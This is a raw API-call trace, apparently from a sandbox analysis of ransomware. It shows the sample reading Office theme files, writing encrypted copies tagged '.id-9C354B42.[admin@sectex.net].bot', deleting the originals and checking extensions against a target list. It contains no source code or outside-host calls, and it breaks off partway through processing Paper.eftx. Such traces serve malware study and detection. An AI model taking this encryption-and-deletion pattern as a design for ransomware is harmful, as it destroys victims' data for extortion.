	[0141.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0141.825] GetLastError () returned 0x0
	[0141.825] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x52a4, lpOverlapped=0x0) returned 1
	[0141.829] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x52b0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x52b0, lpOverlapped=0x0) returned 1
	[0141.830] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.830] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.831] SetEndOfFile (hFile=0x398) returned 1
	[0141.831] CloseHandle (hObject=0x398) returned 1
	[0141.831] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.831] SetEndOfFile (hFile=0x3c4) returned 1
	[0141.833] CloseHandle (hObject=0x3c4) returned 1
	[0141.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 1
	[0141.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.834] lstrlenW (lpString=".doc") returned 4
	[0141.834] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString=".docx") returned 5
	[0141.834] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.834] lstrlenW (lpString=".pdf") returned 4
	[0141.834] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString=".xls") returned 4
	[0141.834] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString=".xlsx") returned 5
	[0141.834] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.834] lstrlenW (lpString=".ppt") returned 4
	[0141.834] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.834] lstrlenW (lpString=".zip") returned 4
	[0141.834] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString=".rar") returned 4
	[0141.834] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.834] lstrlenW (lpString=".bz2") returned 4
	[0141.834] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".7z") returned 3
	[0141.835] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString=".dbf") returned 4
	[0141.835] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString=".1cd") returned 4
	[0141.835] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString=".jpg") returned 4
	[0141.835] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString=".doc") returned 4
	[0141.835] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".docx") returned 5
	[0141.835] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.835] lstrlenW (lpString=".pdf") returned 4
	[0141.835] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".xls") returned 4
	[0141.835] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".xlsx") returned 5
	[0141.835] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.835] lstrlenW (lpString=".ppt") returned 4
	[0141.835] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.835] lstrlenW (lpString=".zip") returned 4
	[0141.835] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".rar") returned 4
	[0141.835] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.835] lstrlenW (lpString=".bz2") returned 4
	[0141.836] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.836] lstrlenW (lpString=".7z") returned 3
	[0141.836] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.836] lstrlenW (lpString=".dbf") returned 4
	[0141.836] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.836] lstrlenW (lpString=".1cd") returned 4
	[0141.836] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned 81
	[0141.836] lstrlenW (lpString=".jpg") returned 4
	[0141.836] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.836] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.836] lstrlenW (lpString="Flow.eftx") returned 9
	[0141.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.843] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=26648) returned 1
	[0141.843] CloseHandle (hObject=0x3a8) returned 1
	[0141.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 0x20
	[0141.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.023] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.023] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.023] GetLastError () returned 0x0
	[0142.023] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x6818, lpOverlapped=0x0) returned 1
	[0142.025] WriteFile (in: hFile=0x3b4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x6820, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x6820, lpOverlapped=0x0) returned 1
	[0142.027] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.027] WriteFile (in: hFile=0x3b4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0142.027] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.027] CloseHandle (hObject=0x3b4) returned 1
	[0142.027] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.027] SetEndOfFile (hFile=0x384) returned 1
	[0142.034] CloseHandle (hObject=0x384) returned 1
	[0142.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 1
	[0142.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.034] lstrlenW (lpString=".doc") returned 4
	[0142.034] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.034] lstrlenW (lpString=".docx") returned 5
	[0142.035] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.035] lstrlenW (lpString=".pdf") returned 4
	[0142.035] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".xls") returned 4
	[0142.035] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".xlsx") returned 5
	[0142.035] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.035] lstrlenW (lpString=".ppt") returned 4
	[0142.035] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString=".zip") returned 4
	[0142.035] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".rar") returned 4
	[0142.035] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".bz2") returned 4
	[0142.035] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".7z") returned 3
	[0142.035] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString=".dbf") returned 4
	[0142.035] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString=".1cd") returned 4
	[0142.035] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString=".jpg") returned 4
	[0142.035] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.035] lstrlenW (lpString=".doc") returned 4
	[0142.035] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.035] lstrlenW (lpString=".docx") returned 5
	[0142.035] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.036] lstrlenW (lpString=".pdf") returned 4
	[0142.036] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString=".xls") returned 4
	[0142.036] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString=".xlsx") returned 5
	[0142.036] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.036] lstrlenW (lpString=".ppt") returned 4
	[0142.036] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.036] lstrlenW (lpString=".zip") returned 4
	[0142.036] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString=".rar") returned 4
	[0142.036] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString=".bz2") returned 4
	[0142.036] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString=".7z") returned 3
	[0142.036] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.036] lstrlenW (lpString=".dbf") returned 4
	[0142.036] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.036] lstrlenW (lpString=".1cd") returned 4
	[0142.036] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76
	[0142.036] lstrlenW (lpString=".jpg") returned 4
	[0142.036] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.036] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.036] lstrlenW (lpString="Newsprint.eftx") returned 14
	[0142.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.037] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=582401) returned 1
	[0142.037] CloseHandle (hObject=0x3c4) returned 1
	[0142.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 0x20
	[0142.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.038] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.038] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.039] GetLastError () returned 0x0
	[0142.039] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x8e301, lpOverlapped=0x0) returned 1
	[0142.051] WriteFile (in: hFile=0x384, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x8e310, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x8e310, lpOverlapped=0x0) returned 1
	[0142.078] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.078] WriteFile (in: hFile=0x384, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0142.078] SetEndOfFile (hFile=0x384) returned 1
	[0142.078] CloseHandle (hObject=0x384) returned 1
	[0142.078] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.078] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.093] CloseHandle (hObject=0x3c4) returned 1
	[0142.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 1
	[0142.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.125] lstrlenW (lpString=".doc") returned 4
	[0142.125] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".docx") returned 5
	[0142.125] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.125] lstrlenW (lpString=".pdf") returned 4
	[0142.125] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".xls") returned 4
	[0142.125] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".xlsx") returned 5
	[0142.125] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.125] lstrlenW (lpString=".ppt") returned 4
	[0142.125] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.125] lstrlenW (lpString=".zip") returned 4
	[0142.125] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".rar") returned 4
	[0142.125] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".bz2") returned 4
	[0142.125] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString=".7z") returned 3
	[0142.125] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.125] lstrlenW (lpString=".dbf") returned 4
	[0142.125] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.125] lstrlenW (lpString=".1cd") returned 4
	[0142.126] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString=".jpg") returned 4
	[0142.126] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString=".doc") returned 4
	[0142.126] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".docx") returned 5
	[0142.126] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.126] lstrlenW (lpString=".pdf") returned 4
	[0142.126] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".xls") returned 4
	[0142.126] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".xlsx") returned 5
	[0142.126] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.126] lstrlenW (lpString=".ppt") returned 4
	[0142.126] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString=".zip") returned 4
	[0142.126] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".rar") returned 4
	[0142.126] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".bz2") returned 4
	[0142.126] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString=".7z") returned 3
	[0142.126] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString=".dbf") returned 4
	[0142.126] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.126] lstrlenW (lpString=".1cd") returned 4
	[0142.126] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81
	[0142.127] lstrlenW (lpString=".jpg") returned 4
	[0142.127] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.127] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.127] lstrlenW (lpString="Paper.eftx") returned 10
	[0142.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.156] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=228746) returned 1
	[0142.156] CloseHandle (hObject=0x3b8) returned 1
	[0142.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 0x20
	[0142.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.156] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.156] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
